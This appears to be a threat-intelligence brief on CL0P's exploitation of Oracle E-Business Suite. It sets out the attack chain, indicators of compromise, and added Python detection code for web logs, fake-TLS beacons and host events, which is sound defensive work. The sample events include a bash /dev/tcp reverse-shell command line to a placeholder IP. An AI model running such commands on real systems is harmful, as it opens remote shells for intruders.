Severity: critical | June 10, 2026

CL0P Ransomware Group Targets Multiple Industries Globally Through Wide-Spread 0-Day Campaigns


CL0P is a financially motivated extortion group with suspected ties to other financially motivated groups and clusters such as FIN11, UNC5936 and UNC6240, and a history of mass-exploitation campaigns against widely deployed enterprise software, including MOVEit, GoAnywhere MFT, and Cleo. Rather than deploying encryption broadly, the group has shifted toward large-scale data extortion: it exploits zero-day vulnerabilities in file transfer platforms (Accellion FTA, GoAnywhere MFT, MOVEit Transfer, Cleo, Oracle EBS, and Gladinet CentreStack) to steal data from hundreds to thousands of victims simultaneously, then threatens to publish it on its dark web leak site unless a ransom is paid.

The group began exploiting zero-day vulnerabilities in Oracle E-Business Suite in July 2025, accumulating significant volumes of stolen data before launching a coordinated extortion email campaign against corporate executives in late September 2025. Throughout this campaign, the second most targeted sector was the entertainment industry. The activity was initially reported by Google in late 2025, after more than 100 organizations were impacted by a vulnerability in Oracle E-Business Suite (CVE-2025-61882, CVSS 9.8).

Initial access was achieved through a multi-stage exploitation chain targeting the Oracle EBS web tier. Attackers combined server-side request forgery, CRLF injection, authentication bypass, and XSL template injection to achieve unauthenticated remote code execution as the EBS application account. A second attack path abused the XDO Template Manager to inject malicious templates directly into the EBS database, with execution triggered by the Template Preview functionality. Once inside, the attacker used a reflective Java class loader to load a secondary component entirely in JVM memory, which then installed a malicious WebLogic servlet filter without ever writing files to disk, bypassing file integrity monitoring entirely. A separate downloader maintained a persistent C2 channel by disguising its beacon traffic as a non-standard TLSv3.1 handshake over HTTPS, blending in with legitimate encrypted traffic.
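The web-tier activity above is visible in the EBS front-end access logs before anything lands in JVM memory. The following is an added example of log triage for that stage, not code from the brief, from Oracle, or from any vendor's detection content. The log lines are constructed; the request paths are placeholders built around the servlet names the brief mentions (SyncServlet, UiServlet, a template upload path); the trailing request-body-bytes field is assumed to come from a mod_logio-style "%I" directive; and the size threshold is an arbitrary starting point to tune per environment.

```python
"""Web-tier triage for the Oracle EBS exploitation path described above.

Added example, not from the brief, Oracle, or any vendor detection content.
Log lines are constructed; paths, the body-size field and the threshold are
assumptions, not values taken from the brief.
"""
import ipaddress
import re

# Common log format plus one extra trailing field: request body bytes (mod_logio "%I" style, assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes_out>\d+|-) (?P<bytes_in>\d+)$'
)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Servlets the brief names as exploitation entry points (case-insensitive substring match).
EXPLOIT_SERVLETS = ("syncservlet", "uiservlet")
# Markers for template/configuration upload paths; assumed, not from the brief.
TEMPLATE_PATH_MARKERS = ("template", "configurator", "xdo")
LARGE_BODY_BYTES = 100_000          # arbitrary starting threshold


def parse_line(line: str):
    """Parse one access-log line into a dict, or return None when it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes_in"] = int(rec["bytes_in"])
    return rec


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def evaluate(rec: dict) -> list:
    """Return the rule names a single access-log record trips."""
    alerts = []
    path = rec["path"].lower()
    if (rec["method"] == "POST" and is_external(rec["ip"])
            and any(s in path for s in EXPLOIT_SERVLETS)):
        alerts.append("external_post_to_exploit_servlet")
    if (rec["method"] == "POST" and rec["bytes_in"] >= LARGE_BODY_BYTES
            and any(mk in path for mk in TEMPLATE_PATH_MARKERS)):
        alerts.append("large_post_to_template_path")
    return alerts


def scan(lines) -> list:
    """(rule, source ip, path) for every alert in a log stream; unparsable lines are skipped."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in evaluate(rec):
            out.append((rule, rec["ip"], rec["path"]))
    return out


SAMPLE_LOG = [  # constructed lines; 203.0.113.0/24 is a documentation range, dates are made up
    '10.20.30.5 - - [06/Oct/2025:08:01:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 412',
    '203.0.113.77 - - [06/Oct/2025:08:05:10 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 312 1877',
    '203.0.113.77 - - [06/Oct/2025:08:05:15 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 500 0 2200',
    '10.20.30.9 - - [06/Oct/2025:08:07:00 +0000] "POST /OA_HTML/xdo/TemplateUpload HTTP/1.1" 200 800 350000',
    '10.20.30.9 - - [06/Oct/2025:08:09:00 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 312 900',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The two rules deliberately split on source: the servlet rule fires only for external sources, because internal integrations legitimately POST to these endpoints, while the large-body rule is source-agnostic, since the template injection path can also be reached from a previously compromised internal host.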

After establishing a foothold, operators performed brief reconnaissance from the compromised EBS application account, collecting network configuration, running process lists, and host topology before exfiltrating data over the same C2 channel. CL0P used the stolen file listings as proof of access in extortion emails sourced through compromised third-party accounts and infostealer credential logs. Organizations that did not apply Oracle's emergency patches faced continued exposure through a second vulnerability, CVE-2025-61884, addressed in a follow-on patch on October 11, 2025.

The in-memory persistence chain is technically distinctive: the entire implant operates in JVM heap memory, defeating file-based detection and endpoint integrity tools. The downloader's use of a fake TLSv3.1 protocol identifier, with C2 results returned inside HTML comment fields, closely mirrors techniques observed in a module attributed to UNC5936 in the December 2024 Cleo exploitation, suggesting shared tooling or developer overlap between the two campaigns.
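Because the implant never touches disk, the network side of this tradecraft is the more reliable place to look: a beacon that only pretends to be TLS has to put bytes on the wire that no real TLS stack would, and the HTML-comment channel leaves encoded blobs in HTTP bodies. The following is an added example of two such checks, not code from the brief or from any vendor tool. All byte strings are constructed; the brief names a fake "TLSv3.1" handshake but gives no byte values, so the version bytes (0x03, 0x1f) used for the fake sample are an arbitrary stand-in for a non-standard value.

```python
"""Two network-side checks for the C2 disguise described above.

Added example, not from the brief or any vendor tool. All samples are
constructed; the fake beacon's version bytes are an assumption, since the
brief does not give them.
"""
import base64
import re
import struct

# Record-layer versions a real TLS stack emits (SSLv3 through TLS 1.3).
KNOWN_TLS_VERSIONS = {(3, 0): "SSLv3", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1",
                      (3, 3): "TLS 1.2", (3, 4): "TLS 1.3"}
HANDSHAKE = 0x16
MAX_RECORD_LEN = 2 ** 14 + 2048     # largest legal TLS 1.2 ciphertext record


def classify_tls_record(payload: bytes) -> str:
    """Classify the first bytes a client sends on a flow to an HTTPS port."""
    if len(payload) < 5:
        return "short"
    content_type, major, minor, length = struct.unpack("!BBBH", payload[:5])
    if content_type != HANDSHAKE:
        return "not-a-tls-handshake"      # plaintext HTTP, or something else entirely
    if (major, minor) not in KNOWN_TLS_VERSIONS:
        return f"suspicious: bogus TLS version {major}.{minor}"
    if length > MAX_RECORD_LEN:
        return f"suspicious: record length {length} exceeds TLS maximum"
    return f"ok: {KNOWN_TLS_VERSIONS[(major, minor)]}"   # record-layer version, not negotiated version


_COMMENT = re.compile(rb"<!--(.*?)-->", re.S)
_B64_BODY = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
MIN_BLOB_LEN = 48


def suspicious_html_comments(body: bytes) -> list:
    """Return HTML comments whose content is a long base64-looking blob rather than a markup note."""
    hits = []
    for m in _COMMENT.finditer(body):
        inner = re.sub(rb"\s+", b"", m.group(1))
        if len(inner) >= MIN_BLOB_LEN and _B64_BODY.match(inner):
            hits.append(inner)
    return hits


# --- constructed samples ---------------------------------------------------
# A normal TLS 1.2-era ClientHello prefix: record version 3.1, handshake type 1.
GOOD_CLIENT_HELLO = b"\x16\x03\x01\x00\xc5\x01\x00\x00\xc1\x03\x03" + bytes(32)
# Stand-in for the fake beacon: handshake content type with a version no stack uses.
FAKE_BEACON = b"\x16\x03\x1f\x00\x40" + bytes(64)
PLAIN_HTTP = b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"

# What recon output smuggled back inside an HTML comment might look like (constructed).
RECON_OUTPUT = b"uid=1001(ebsapp) gid=1001\neth0: 10.1.2.3\n" * 2
SAMPLE_RESPONSE = (
    b"<html><body>\n<!-- page header -->\n<p>ok</p>\n"
    b"<!-- " + base64.b64encode(RECON_OUTPUT) + b" -->\n"
    b"<!-- Copyright notice: all rights reserved. -->\n</body></html>"
)

if __name__ == "__main__":
    for name, sample in [("good", GOOD_CLIENT_HELLO), ("fake", FAKE_BEACON), ("http", PLAIN_HTTP)]:
        print(name, classify_tls_record(sample))
    print(suspicious_html_comments(SAMPLE_RESPONSE))
```

The version check is cheap enough to run on every new flow to port 443 at a sensor; the comment check only applies where HTTP bodies are decrypted (a TLS-terminating proxy or the server's own response logging), which is exactly where the brief's C2 results would be visible.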

Indicators of compromise

IP addresses (4)
  • 200.107.207.26
  • 161.97.99.49
  • 162.55.17.215
  • 104.194.11.200

Email addresses (2)
  • support@pubstorm.com
  • support@pubstorm.net

Detections (10)


  • Bash Reverse Shell via dev/tcp Spawned by Java Web Process
  • Oracle EBS Post-Exploitation Linux Reconnaissance via SentinelOne
  • Oracle EBS SyncServlet POST from External IP
  • SAGEWAVE Servlet Filter Activation Path
  • Oracle EBS UiServlet Exploitation Attempt from External IP
  • EBS Application OS Account Spawning Interactive Shell
  • Java or WebLogic Process Initiating Outbound TCP on Non-HTTP/S Port to External IP
  • Anomalously Large POST Body to Oracle EBS Template or Configuration Path
  • High-Frequency Short-Lived Process Burst from Java Parent on Application Host
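Several of the host-side detections listed above reduce to a handful of rules over process and network-connection telemetry, plus one stateful count. The following is an added example of that logic, not the vendor's detection content. The event dictionaries mimic EDR telemetry but are constructed; the EBS OS account name ("ebsapp"), the thresholds, the PIDs and the external IP are placeholders, not values from the brief.

```python
"""Toy rule engine for the host-side detections in the list above.

Added example, not the vendor's detection logic. Events, account name,
thresholds and addresses are constructed placeholders.
"""
import ipaddress
from collections import defaultdict

EBS_APP_ACCOUNTS = {"ebsapp"}          # assumed OS account running the EBS application tier
JAVA_MARKERS = ("java", "weblogic")
SHELLS = {"bash", "sh", "dash", "zsh"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BURST_THRESHOLD = 5        # at least this many short-lived children ...
BURST_WINDOW_S = 10.0      # ... started within this many seconds of each other ...
SHORT_LIVED_S = 2.0        # ... each living no longer than this


def is_java(image: str) -> bool:
    return any(m in image.lower() for m in JAVA_MARKERS)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def rule_dev_tcp_reverse_shell(ev) -> bool:
    # Bash's /dev/tcp pseudo-device in a command line whose parent is the Java web process.
    return ev["type"] == "process" and is_java(ev["parent_image"]) and "/dev/tcp/" in ev["cmdline"]


def rule_app_account_interactive_shell(ev) -> bool:
    # The application OS account launching an interactive (-i) shell is rare on an app host.
    if ev["type"] != "process" or ev["user"] not in EBS_APP_ACCOUNTS:
        return False
    return ev["image"].rsplit("/", 1)[-1] in SHELLS and "-i" in ev["cmdline"].split()


def rule_java_outbound_non_http(ev) -> bool:
    # Java/WebLogic talking to an external host on something other than 80/443.
    return (ev["type"] == "netconn" and is_java(ev["image"])
            and ev["dst_port"] not in (80, 443) and is_external(ev["dst_ip"]))


STATELESS_RULES = {
    "bash_reverse_shell_via_dev_tcp": rule_dev_tcp_reverse_shell,
    "ebs_account_interactive_shell": rule_app_account_interactive_shell,
    "java_outbound_non_http_external": rule_java_outbound_non_http,
}


def burst_parents(events) -> list:
    """Java parent PIDs that spawned BURST_THRESHOLD short-lived children inside BURST_WINDOW_S."""
    starts = defaultdict(list)
    for ev in events:
        if (ev["type"] == "process" and is_java(ev["parent_image"])
                and ev.get("duration_s", float("inf")) <= SHORT_LIVED_S):
            starts[ev["ppid"]].append(ev["ts"])
    hits = []
    for ppid, times in starts.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):          # sliding window over child start times
            while times[hi] - times[lo] > BURST_WINDOW_S:
                lo += 1
            if hi - lo + 1 >= BURST_THRESHOLD:
                hits.append(ppid)
                break
    return hits


def evaluate(events) -> list:
    """(rule name, identifier) pairs for every alert in an event batch."""
    alerts = [(name, ev["ts"]) for ev in events for name, rule in STATELESS_RULES.items() if rule(ev)]
    alerts += [("java_child_process_burst", ppid) for ppid in burst_parents(events)]
    return alerts


JAVA = "/opt/jdk/bin/java"
SAMPLE_EVENTS = [  # constructed; 203.0.113.0/24 is a documentation range
    {"type": "process", "ts": 100.0, "pid": 5001, "ppid": 4242, "user": "ebsapp", "image": "/bin/bash",
     "parent_image": JAVA, "cmdline": "bash -c exec 5<>/dev/tcp/203.0.113.5/4444", "duration_s": 900.0},
    {"type": "process", "ts": 130.0, "pid": 5002, "ppid": 5001, "user": "ebsapp", "image": "/bin/bash",
     "parent_image": "/bin/bash", "cmdline": "bash -i", "duration_s": 600.0},
    {"type": "netconn", "ts": 131.0, "pid": 4242, "image": JAVA, "dst_ip": "203.0.113.5", "dst_port": 4444},
    {"type": "netconn", "ts": 132.0, "pid": 4242, "image": JAVA, "dst_ip": "10.20.30.40", "dst_port": 1521},
]
# Recon burst: six short-lived children of the Java parent within five seconds.
for i, cmd in enumerate(["id", "hostname", "ifconfig -a", "ps -ef", "netstat -an", "cat /etc/hosts"]):
    SAMPLE_EVENTS.append({"type": "process", "ts": 140.0 + i, "pid": 6000 + i, "ppid": 4242, "user": "ebsapp",
                          "image": "/usr/bin/" + cmd.split()[0], "parent_image": JAVA,
                          "cmdline": cmd, "duration_s": 0.2})

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The burst rule is the one worth the most tuning: the brief describes only brief reconnaissance from the application account, so the window and threshold should be set from a baseline of what the EBS host's Java process normally spawns (backup and concurrent-manager jobs are the usual sources of legitimate short-lived children).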